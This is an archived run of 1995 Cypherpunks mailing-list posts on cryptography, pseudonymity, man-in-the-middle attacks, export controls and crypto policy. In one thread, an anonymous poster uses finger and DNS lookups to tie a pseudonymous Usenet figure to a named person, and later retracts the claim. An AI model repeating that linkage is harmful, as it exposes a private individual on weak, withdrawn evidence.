anything about the pseudonum that you have not experienced yourself without trusting
someone else (VeriSign in the first example). Thus the problem is more reputation
transfer than anything else.

Jon C. Baber
jbaber@mi.leeds.ac.uk
http://www.chem.surrey.ac.uk:80/~ch02jb/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 6 Oct 95 16:43:55 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
Message-ID: <ac9b0caf2d0210048576@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:36 PM 10/6/95, Scott Brickner wrote:

>I'm not an expert here, but I understand the "well-known methods" to
>essentially use some formula that "tends" to generate prime numbers from
>uniformly distributed numbers, feed it a "good" random number, and then
>check to see if it's really prime.  If it's not, pick another "good"
>random number and try again.  The entropy in the prime is the same
>as in the random number generator.

The commonly used method is to generate a random number, then interate up
(or down, it doesn't matter), testing each number in turn for primality.
One doesn't have to test too many numbers to find a prime, as I explained
in my last post.

It is indeed true that the entropy or randomness lies in the selection of
the random number that one starts searching from.


--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Fri, 6 Oct 95 17:04:03 PDT
To: cypherpunks@toad.com
Subject: Revised CJR
Message-ID: <199510070003.RAA12771@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   Here's the latest version of the CJR. If I get the time, I'll send
it out tomorrow. Thanks to everyone who responded, especially those
with constructive comments.

Raph

ATTN: Samuel L. Capino - 15 Day CJ Request
Defense Trade Analyst
U.S. Department of State
Office of Defense Trade Controls
PM/DTC SA-6 Room 200
1701 N. Fort Myer Drive
Arlington, VA  22209-3113
Fax +1 703 875 5845

ATTN: 15 Day CJ Request Coordinator
National Security Agency
P.O. Box 246
Annapolis Junction, MD  20701


Subject:  Mass Market Software with Encryption - 15 Day Expedited Review
          Requested

Subject:  Commodity Jurisdiction Request for
          perl-RSA t-shirt, an encryption program

INTRODUCTION

This is a Commodity Jurisdiction Request for mass market software
with encryption capabilities.  
 
The name of the software product is "perl-RSA t-shirt", by
Adam Back. It is published in the form of a t-shirt by Joel Furr, 916
W. Trinity Ave, #10, Durham NC 27701.

I have no DTC registration code.

I have reviewed and determined that this t-shirt, the subject of this CJ
request, meets paragraph 1 of the "Criteria for Determining the
Eligibility of A Mass Market Software Product for Expedited Handling."

I base this determination on the following facts:

a) this t-shirt is readily available from Joel Furr, and has been
shipped in quantity of several hundred copies, thus qualifying it as
mass market software;

b) sufficient documentation is included to allow installation and use
by any end user capable of typing in the software, or scanning the bar
code, and running it. Additional documentation is available on the
Internet World Wide Web at http://dcs.ex.ac.uk/~aba/rsa/ . To my
knowledge the author and publisher provide no "product support" as
that term is generally understood; and

c) the t-shirt contains human- and machine-readable source code for
encryption software that provides confidentiality.

A duplicate copy of this CJR has been sent to the 15 Day CJ Request
Coordinator.

DESCRIPTION

The t-shirt contains an implementation of the RSA asymmetric
cryptographic algorithms. Furthermore, instructions, in the form of a
terse usage string, are given for using the implementation to provide
confidentiality. The source code of the implementation is featured
both as four lines of text and also as a bar code, making the t-shirt
machine readable as well as machine washable. The algorithm is
implemented in the Perl scripting language, and will run on any
standard Unix (or other operating system) configuration that includes
both an implementation of the Perl language and the common "dc" (desk
calculator) program.

The only restrictions on the size of the key are those imposed by
machine resources. The software is easily capable of handling keys
well in excess of 512 bits.

Two copies of the shirt are included with the filing of this CJ
request.

ORIGIN OF COMMODITY

This t-shirt originates in the United States. While the primary author
is a citizen of the United Kingdom, living in England, other
contributors to the work are citizens of the US living in the US. The
publisher is a United States citizen living in the United States. The
t-shirts are manufactured and printed in the United States.

The cryptographic algorithm implemented in this t-shirt comes from
various sources, at various times, and was produced with both private
and public sources of funding.

The source code implementation contained in the t-shirt also comes
from a variety of countries, including Australia, Canada, the United
States and the United Kingdom.

The algorithm is thought to be designed for private and commercial
civilian use.

The t-shirt is currently publicly available from Joel Furr, at a list
price of $12.36, including shipping and handling. More ordering
information is available on the Internet World Wide Web at
http://www.danger.com/ad-perl.html .

CURRENT USE

The t-shirt is intended as an implementation of the RSA cipher for
those who wish to incorporate encryption into their communications.
The small size of the implementation makes it particularly useful in
contexts in which existing cryptographic infrastructure is not
available.

Examples of the commercial use of the cipher implemented include
integrity verification, authentication and confidentiality of
electronic mail, computer software, voice, video and other information
in digitized form. For example, the cipher is used either by itself
for email privacy, and also as a component in other protocols that
provide privacy and authentication, including PGP (Pretty Good
Privacy), S/MIME (Secure Multipurpose Internet Mail Extensions), MOSS
(MIME Object Security Services), PEM (Privacy Enhanced Mail), and SSL
(Secure Sockets Layer).

The uses of this cipher have not changed significantly over time,
although their popularity has grown substantially. Their present
military utility is unknown, except that it is believed that the
algorithm is not approved for the protection of US classified
information.

SPECIAL CHARACTERISTICS

There are no military standards or specifications that this t-shirt is
designed to meet. There are no special characteristics of the t-shirt,
including no radiation-hardening, no ballistic protection, no hard
points (the t-shirt is only available in soft 100% cotton), no TEMPEST
capability, no thermal and no infrared signature reduction capability
(in excess of that provided by a typical black cotton t-shirt), no
surveillance, and no intelligence gathering capability. The t-shirt
does not use image intensification tubes.

OTHER INFORMATION

I recommend that this t-shirt be determined to be in the jurisdiction
of the Commerce Department. I believe that it qualifies for the
general license GTDA for General Technical Data to All Destinations,
because it qualifies as "publicly available".

ATTACHMENTS

I have enclosed two copies of the t-shirt, included with the primary
filing of this CJ request.


                                        Sincerely,



                                        Raphael L. Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 6 Oct 95 16:47:04 PDT
To: cypherpunks@toad.com
Subject: Re: Who knows the story on Elementrix OTP??
Message-ID: <ac9b0d7e2e021004b631@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:37 PM 10/6/95, MINITERS@citadel.edu wrote:
>Aclaim is being made to having a technique for utilizing OTP with a spiffy key
>generation technique that requires no transmission over an unsecure link.
>Who knows the details of the approach and the particulars on the developers?


This has been discussed in great detail on the list.

I hate to chide Syl publically, but people need to be reminded that they
should not skip the messages and then ask questions that have already been
covered in gory detail.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 6 Oct 95 09:10:18 PDT
To: cypherpunks@toad.com
Subject: National Secuirty Science and Technology Strategy
Message-ID: <199510061610.RAA20340@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



This excerpt is from the summary of a long policy
statement on the National Security Science and Technology
Strategy published by the White House on September 19.
The full report is well worth reading -- it addresses
military, economic, intelligence, scientific and
technological issues and lays out projected initiatives.

Has anyone seen news reports on this? 

-----

>From URL:
http://www.whitehouse.gov/White_House/EOP/OSTP/
nssts/html/execsum-plain.html


                   Executive Summary

_______________________________________________________

In March 1995, President Clinton ordered a sweeping
reexamination of the United States Government's approach
to putting science and technology to the service of
national security and global stability in light of the
changed security environment, increasing global economic
competition, and growing budgetary pressures.

This National Security Science and Technology Strategy,
the product of that reexamination, is the country's first
comprehensive Presidential statement of national security
science and technology priorities.

It augments the President's National Security Strategy of
Engagement and Enlargement by articulating science and
technology policies and initiatives that support the
President's three primary national security objectives:
enhancing our military readiness and capabilities,
preventing conflict from occurring through engagement
with other nations, and promoting prosperity at home. It
advances that document's central approach of preventing
conflict and maintaining the capability to respond should
conflict occur.

It is built on the recognition that our security depends
on economic strength as well as military power. And it is
grounded in the conviction that investment in science and
technology is central to our ability to meet the
challenges ahead.

This National Security Science and Technology Strategy
defines our new approaches to applying science and
technology to the challenges that most directly affect
our nation's security.

[snip balance of summary]











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 6 Oct 95 16:51:46 PDT
To: cypherpunks@toad.com
Subject: Re: CancelMoose = William Nagengast?
Message-ID: <ac9b0e3a2f021004e24b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:21 PM 10/6/95, Anonymous wrote:
>I did a little digging around, and came up with the following identity
>for the cancelmoose:
>
>> finger moose@panix.com
>[panix.com]
>Login Name: moose                       Full Name: William Nagengast
>Directory: /net/u/11/m/moose            Shell: /usr/local/bin/psh
>Last login Wed Nov  9 17:21:18 on panix.com ttyq2 from ts3.nyc.access.n.
>No mail information available.
>
>Is this publicly known information?

Who cares?

And if I did care who the "cancelmoose" is, I'd care more about the trail
of evidence "Anonymous" thinks links "cancelmoose" to the eponymous moose
at panix.com. Name space collisions are hardly convincing.

Oh, did I tell you I discovered the real identity of Jack the Ripper? A
finger of ripper@netcom.com reveals some very interesting information. Film
at 11.

Once again, anonymity is being used as a cover for cluelessness.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 6 Oct 95 17:03:24 PDT
To: cypherpunks@toad.com
Subject: MITM = Medusa in the Middle
Message-ID: <ac9b0fca30021004405f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:08 PM 10/6/95, the personality masquerading as Hal wrote:

>Well, this is not necessarily the case.  A MITM may be signing my
>messages for me, and then putting them back the way they were before I
>am allowed to see them.  Granted, this would not be easy, and perhaps
>the difficulty of this would be great enough that you will feel
>comfortable using an unsigned key.  But if it were accomplished, then
>your messages to me would actually be insecure.  No matter how
>convinced you became of my sincerity and trustworthiness, actually our
>conversations would be overheard by a third party despite both of our
>efforts to the contrary.  Our use of encryption would be rendered
>futile.  Doesn't this bother you?

What the putative entity "Hal" is only hinting at, hypothetically, has
actually forced this entity, sometimes known to many of you as "Tim," or as
"tcmay," to reveal.

This entity now feels the time has come to reveal it's True Nature, even
though some have suspected it's True Nature (Lance, are you listening?).

The "real" Timothy C. May has been locked in his room since 1983, fed
through a slot in his door, and generally mentally tortured by
Instrumentalities such as Ourself.

We have interposed Ourself between the Real Timothy C. May and those who
have communicated with him. All communications intended for Timothy C. May
have actually been intercepted and processed by Us, and all communications
attributed to Timothy C. May were actually generated by us. Very clever of
us, don't you think? Very few have even expressed suspicions that this was
the case.

We have called our approach the "Medusa in the Middle," or MITM.

Thank you for your attention.

--Snake


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Fri, 6 Oct 95 15:29:03 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: subjective names and MITM
In-Reply-To: <ac99e72b260210048f1f@[205.199.118.202]>
Message-ID: <199510062228.SAA27940@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:
>If I understand your usage of "anonym" correctly, I think you are clearly wrong.

I think you understand my usage (anonym = untraceable pseudonym).  But
I still disagree with you.

I brought this subject up a couple of weeks ago (as the "inheritance
problem"), but was unable to really participate in the discussion as
things got a little busy.

A quick note on terminology:  I'll use "name" to mean a symbol which
may be easily traced to a physical entity, "pseudonym" to mean a symbol
which is traceable only under certain conditions, and "anonym" to mean
a symbol which is not traceable.

>The "linking with a unique person" is not especially important, IMO.

The reputation of an anonym is fundamentally different from that of a
name or pseudonym.  When a named or pseudonymous entity fails to
perform a contract, the pseudonym is exposed (becoming a name), and the
reputations of all names associated with the entity suffer.  Further,
creating a new name doesn't help, as it gets the reputation of the
other names.

There are basically two kinds of pseudonyms that I can see:  I'll call
them escrowed identities and encrypted identities.  With an escrowed
identity, an escrow agent knows who I am and part of our contract says
they're permitted to reveal the name under enumerated circumstances.
An encrypted identity is one which is revealed by the act of violating
the contract - like the double-spending protections in e-cash - and the
KCA merely certifies that the tokens were created correctly.

Escrowed identities are vulnerable to "rubber-hose cryptanalysis" and
other forms of social engineering, but there are many sorts of
transactions which don't permit encrypted identities for technical
reasons.

In both circumstances, an involved KCA may attest to more than the
traceability of the identity.  The KCA may also certify that, at the
time of certification, the identity's reputation was "clean" with
respect to some standard.  Note that the KCA knows a *name* for the
entity, and thus imbues the newly created pseudonym with the reputation
of the name.  The entity still hasn't escaped a poor reputation with a
new pseudonym (if the KCA's reputation is trustworthy, that is).

In effect, names are two-way links between reputations and entities,
pseudonyms are one-way links from reputations to entities, and anonyms
are broken links between them.  Reputation credit will flow from a name
to its entity, and then flow back out to all the entity's other names.
Reputation debit will flow from a name *or pseudonym* to the entity and
then back to all the other names (but not pseudonyms).  Anonyms don't
transmit their reputation to anything.

The upper limit of credit worthiness in an anonym lies in the cost of
replacing it.  If I can create a new reputation for $1000, and you've
loaned me $1500, then I can abandon the old one at a profit of $500.
Clearly you can't extend me more credit than it will cost me to create
a new anonym.

Given the dearth of anonymity (or even pseudonymity) today, it seems
that the average entity doesn't value anonymity particularly highly.
How many people do you know that use credit cards for virtually
*everything*, simply because they value the convenience of a single
monthly statement and the security of not carrying cash more than they
value anonymity?  I know several.

This implies that the cost of creating an anonym must be fairly low if
they are to become commonplace, which further implies that the credit
worthiness of anonyms must be correspondingly low.

The next question is whether a low-cost anonym can ever expect to be
considered an "expensive" (and therefore credit worthy) anonym.  Let's
consider anonyms like Pr0duct Cypher and Black Unicorn, since you
always bring them up as examples of anonyms with reputation.

Certainly the entities behind these anonyms have a certain amount of
time and energy invested in them.  They *do* have a reputation, but
it's a reputation regarding the quality of their products.  If you were
to advance one of them $500 in consideration for writing some software,
and they took the money and didn't produce the software, how would that
hurt them?  Certainly they wouldn't be likely to get another such
contract --- it would be cash on the barrelhead from there on out, just
like any cheap anonym.  Their reputation for quality information and
freeware wouldn't change a bit.

There's clearly a large risk involved in loaning money to an anonym
with no reputation for paying back loans.  Only completed contracts
with named entities improve the anonym's reputation.  Contracts with
other anonyms or pseudonyms are unreliable indicators --- otherwise I
could create a hundred anonyms (or encrypted-identity pseudonyms) and
have ninety-nine of them report successful transactions to create an
artificial reputation.  Multiple contracts with the same named entity
are also unreliable --- I can falsely report successful transactions
with my own anonyms, too.  A small number of named entities may even
act in collusion to create an artificial reputation.

The credit reputation of the anonym is thus reliable only in proportion
to the number of named entities with which it successfully transacts.
Furthermore, a transaction with a traceable entity is implicitly
secured by the other assets of the entity, so the amount risked in a
loan is not the entire amount of the loan.  There's no reason for an
anonymous entity to hold any assets --- anything they need may simply
be held by another entity, and thus protected from seizure.  The amount
risked in a loan to an anonymous entity is the full amount of the loan,
so the credit limits for an anonym will grow *much* more slowly than
for traceable entities.

Assuming the existence of a reputable escrow agent for pseudonyms, the
cost to establish a given credit rating for a pseudonym is *much* less
than that for an anonym while the risk of undesirable disclosure is
only slightly more.  If the anonym is sought only for privacy, then
a pseudonym is a much better buy.  It's when the cost of disclosure
is very high that the anonym becomes desirable.  So what sort of entity
has so much to lose by disclosure that it's unwilling to accept the risk
involved with a pseudonym escrowed with a reputable agent? (Remembering
that we're talking about a world that's sufficiently changed as to
permit anonyms at all --- something I don't think can happen in America
today, for instance.)  Would you want to do business with them?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Fri, 6 Oct 95 14:35:36 PDT
To: cypherpunks@toad.com
Subject: Re: NSA Realists v. Nuts (Was: Re: Crypto APIs)
Message-ID: <P7JkcD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Perry E. Metzger" <perry@piermont.com> writes:

> Learn to live with a new model for how you work now, and you will save
> years of bitter and futile agony for everyone.

Keep in mind that all they are really trying to save are their "lines" in the
annual budget bill. Transfer them to another agency with the same pay and
bennies, and we'll all be happier. The International Whaling Commission comes
readily to mind. 



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: LIBERTY!! Use it or lose it!!

iQCVAwUBMHWgu974r4kaz3mVAQFfGgP/SU52c5wCUYmyXx/qmVDbuhcncEicbDEG
gYqg3XFaiZuMU+eeQ9IxoTay3qlzZrnKvEr3VhLeALvwq/sXs+CHO8cL6FgGwzOI
6B27VAdOWieAGmgr0lmCDJnmj7Lt9lEOg/dpl0IoZPI6Y6J9TDdmmjvBmbnRozqu
mwkpDiNu+3g=
=Fig2
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                             jgrubs@webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Fri, 6 Oct 95 15:36:40 PDT
To: patrick@verity.com (Patrick Horgan)
Subject: Re: subjective names and MITM
In-Reply-To: <9510061724.AA01171@cantina.verity.com>
Message-ID: <199510062236.SAA28120@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Patrick Horgan writes:
>Given the difficulty of finding primes, how likely do you think it is that
>given one of the well known methods and finding the first 1024 bit prime
>that pops out would give you an effective attack?

I'm not an expert here, but I understand the "well-known methods" to
essentially use some formula that "tends" to generate prime numbers from
uniformly distributed numbers, feed it a "good" random number, and then
check to see if it's really prime.  If it's not, pick another "good"
random number and try again.  The entropy in the prime is the same
as in the random number generator.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 6 Oct 95 09:35:14 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Graphic encryption
Message-ID: <Pine.3.89.9510061737.A25324-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Oct 1995, Lucky Green wrote:

>And by the way, "proprietary" algorithms are generally junk and should not
>be relied upon by security concious individuals and businesses. Only
>algorithms that have undergone extensive peer review should be considered
>for use.

It's OK, when these guys were spamming Usenet a few weeks ago with their 
product announcement (admittedly, they did at least keep it to comp 
groups) they said it was export-approved. Therefore, it can be pretty 
much written off from a security standpoint - it's at best as good as 
40-bit RC4, and I sure wouldn't use that for secure communications.

I'd still like to know how it works so we can see just how insecure it 
is, though.

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Fri, 6 Oct 95 14:42:58 PDT
To: List <cypherpunks@toad.com>
Subject: Microsoft encryption
Message-ID: <Pine.OSF.3.91.951006174218.7617A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone have any information about the methods used to password 
protect Word documents and Access files? Is there a general way to 
decode these files?

Thanks,
Tim Philp


===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Fri, 6 Oct 95 18:19:33 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates, Attributes, Web of Trust
In-Reply-To: <3074DAAB.3D62@netscape.com>
Message-ID: <3075D5AD.76CC@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai wrote:
> >   If you take a look at verisign's home page, they will be offering
> > "low assurance" certificates for free for non-commercial uses.  The
> > only thing they will guarantee about these certs is that the subject
> > name in the certificate is unique across all certificates signed
> > by their class I CA.  You should be able to get one of these
> > certs in real time via an HTML form.
> 
> What is the point of this?  What is to prevent someone from
> getting certificates for a million of the most common and/or famous names
> as quickly as possible?

Here is a scenario under which it would have a point. This is not totally
secure, but that does not make it useless.

1) Register e-mail addresses.

2) Send the resulting signed certificates back to the registered
   subject name.

3) After you get your signed certificate, mail it to your friend. Now
   your friend can send you signed or encrypted messages.

4) If you ever get a certificate in e-mail from somebody, feel free
   to use the telephone to verify that it is coming from somebody
   you trust.

Remember, the service is free. In this case, I think you will be
getting more than you paid for.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: syrinx@c2.org (Syrinx Anonymous Remailer)
Date: Fri, 6 Oct 95 18:38:06 PDT
To: cypherpunks@toad.com
Subject: Re: CancelMoose = William Nagengast?
In-Reply-To: <ac9b0e3a2f021004e24b@[205.199.118.202]>
Message-ID: <199510070132.SAA26471@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Who cares?

Well, nobody, really. Actually I feel kinda guilty about posting this
in the first place.

> And if I did care who the "cancelmoose" is, I'd care more about the trail
> of evidence "Anonymous" thinks links "cancelmoose" to the eponymous moose
> at panix.com. Name space collisions are hardly convincing.

Sorry. I did leave out one key piece of information:

> host cm.org
cm.org mail is handled by panix3.panix.com
cm.org mail is handled by not-a-firewall.panix.com
cm.org mail is handled by panix4.panix.com
cm.org mail is handled by panix.com
cm.org mail is handled by panix2.panix.com

That, in conjunction with the fact that moose@cm.org is the email
address given for the cancelmoose, does point to the connection.

However, after a little further investigation, I don't think it really
is Mr. Nagengast. It actually appears that panix.com is running a
little remailer. As Dave Winer would say, cooooool.

> Oh, did I tell you I discovered the real identity of Jack the Ripper? A
> finger of ripper@netcom.com reveals some very interesting information. Film
> at 11.

> Once again, anonymity is being used as a cover for cluelessness.

You're right. My sincerest apologies.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 6 Oct 95 18:02:50 PDT
To: cypherpunks@toad.com
Subject: MITM attacks and True Names (again...)
Message-ID: <199510070102.TAA14826@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

What is the difference between having a conversation with a spook 
masquerading as a cypherpunk (or vice versa) and having a conversation 
which is, unbeknownst(sp?) to either of you, monitored and modified by 
a "Man in the Middle" (hereafter: "Mitch", the Man in the Channel)?


The difference is that in the second case there actually is an entity,
separate from the one in control of the other end of your conversation,
with whom you are (sort of) conversing.  Furthermore it is practically
(if not theoretically) possible for that entity to evade Mitch and
contact you directly.  So much for the debate about "talking to public
keys".


(As an aside I fully sympathize with those who rail against the popular
(?) impression that a True Name is somehow necessary to communication.
That is a dangerous idea, since all a True Name is really necessary for
is violence.  (And, pending certain eagerly-awaited technological
developments, for sex.))


Now I have four things to say about this "evasion of Mitch" thing.
Don't worry, they are all short and some of them are interesting.


1.  A dense, strong Web of Trust is very important.  This should 
already be obvious, but point 2 should make it even more so.


2.  It should be each person's responsibility to ensure that their 
true public key has reached the Web of Trust.  If you make a habit of 
delivering copies of your true public key to members of the Web of 
Trust via multiple channels which should be difficult for Mitch to 
intercept, (e.g. snail mail, connections from pay phones to local net 
nodes, courier delivery, phone calls, face-to-face meetings, etc. etc) 
then you can make it arbitrarily difficult for Mitch to keep your true 
public key off the WoT.
  Others can just use the public key for you which they get from the
WoT (of course, they have to make sure that *they* are strongly
connected to the Web by sending their own public key through multiple
channels!).  If other keys show up claiming to be you then we have an
interesting denial-of-service sort of scenario where psychology and
reputation and crypto and all kinds of interesting stuff get mixed in,
but at least we are relatively safe from an un-noticed MITM attack.


3.  There is one other method that can help foil Mitch: the "overload
his processors" trick.  Pay attention to the lag time between
transmission and reception of messages.  Then send a very large
message, or many messages simultaneously.  If it takes longer to get
there (modulo normal processing penalty, normal net lag variation, the
possibility that Mitch was delaying transmissions specifically in
preparation for this trick, etc etc etc) then you know Mitch is in the
channel.  Highly interactive, complex-signal stuff like voice and video
is perfect for this.  Even the NSA can't intercept a PGPFone session
and fake my voice in real time, echoing me when necessary and replacing
my words with other words when necessary.  For this reason PGPFone will
hopefully be quite a boon to the Web O T.  (Thanks to Seb Kuzminsky for
bringing the "overload his processors" trick to my attention.)


4.  Mitch's big opportunity is to strike before the Web is formed.
Once your key is in the Web then his only options are:  1.  acquire
your secret key.  2.  wait til you forget your passphrase and then get
in the middle when you announce a new public key unsigned by the old
one.  or 3.  launch a really mean denial of service attack on you.  
This is one of the reasons that I sign almost all of my outgoing
messages, even to people who don't use PGP.  I can use these
accumulated messages to demonstrate to others that I, Bryce, really was
in control of the PGP public key whose ID is 0x617c6db9 and the one
whose ID is 0x148a11e5 during this time.  This might be important
someday.
  (My *primary* reason for clearsigning everything is to let others know
about PGP's existence and to encourage them to start using it.)


  (And to advertise my cybershop product...)



Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0

iQCVAwUBMHXRmvWZSllhfG25AQEp7wP/TiLAlfy4S5WeQX8Xgxf0Ng/83UJLffAS
oMrALvPdmTA/wTA1a5/5oUAP/FUTY0uDoR/ELX99yO353B4pljl1yMhk3VW7vNuN
6egklSRsqBBNsJ5qNekDZmuRmxnucCHvn90EXo8BHfyUwGDMksUq77a982aHbYWd
ctF/T35KomQ=
=3hTQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 6 Oct 95 20:34:26 PDT
To: cypherpunks@toad.com
Subject: Re: CancelMoose = William Nagengast?
Message-ID: <ac9b4284310210042b5f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:32 AM 10/7/95, Syrinx Anonymous Remailer wrote:
...
>Well, nobody, really. Actually I feel kinda guilty about posting this
>in the first place.
...
>Sorry. I did leave out one key piece of information:
>
>> host cm.org
>cm.org mail is handled by panix3.panix.com
...
>However, after a little further investigation, I don't think it really
>is Mr. Nagengast. It actually appears that panix.com is running a
>little remailer. As Dave Winer would say, cooooool.
...
>You're right. My sincerest apologies.

Well, presuming that the two anonymous parties are the same, I'm impressed
that Anonymous was fairly graceful in his comments here.

Good to see, as so many "Anonymous" comments are only flames and insults.

Too bad we don't who she or he is.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 6 Oct 95 21:02:00 PDT
To: cypherpunks@toad.com
Subject: Re: MITM attacks and True Names (again...)
In-Reply-To: <199510070102.TAA14826@nagina.cs.colorado.edu>
Message-ID: <199510070400.VAA12311@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Although I have been in effect arguing against using unsigned and
uncertified keys, I don't think the PGP web of trust model works that
well either.  I have an essay on this at <URL:
http://www.portal.com/~hfinney/web_of_trust.html>.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Fri, 6 Oct 95 12:08:18 PDT
To: cypherpunks@toad.com
Subject: Council of Europe on Crypto: Finland
Message-ID: <199510061907.VAA17084@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


People have been digging the background of the Council of Europe
recommendations here in Finland.  It has turned out that Finland was
represented an assistant director of the Criminal Police who is known
as a supporter of extremely broad powers for the police.  At the
meeting, he has apparently presented his personal opinion as the
official opinion of Finland; later the Council unanimously decided to
recommend banning strong crypto.  I hear a representative from Norway
had apparently tried to speak some sense at the meeting, but had
quickly been quieted by the others.

It has also turned out that there have been studies on legislating
cryptography and related issues in Finland during the past two years,
but without concrete plans.  The officials in charge of these issues
were not aware of what was happening in Strasburg, and what Finland
apparently has presented there certainly does not represent a
concensus within the government.  Things appear to be developing in
promising directions, but much more work is still needed until things
are on the right track.

I strongly urge people in other European countries to contact their
government officials, the press, and use other possible channels to
dig out what exactly was happening and why, and make the officials and
politicians understand the other issues that are related (computer
security, universal surveillance, ability of independent political
groups to function, trade secrets, etc).

Professors and other persons in expert positions are important sources
of information to the government in the preparatory process, and you
should provide the officials with experts to consult on the issues.
At least here it has turned out that preparations were being carried
out with very few independent experts, input coming almost exclusively
from the law enforcement side.

    Tatu Ylonen <ylo@cs.hut.fi>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
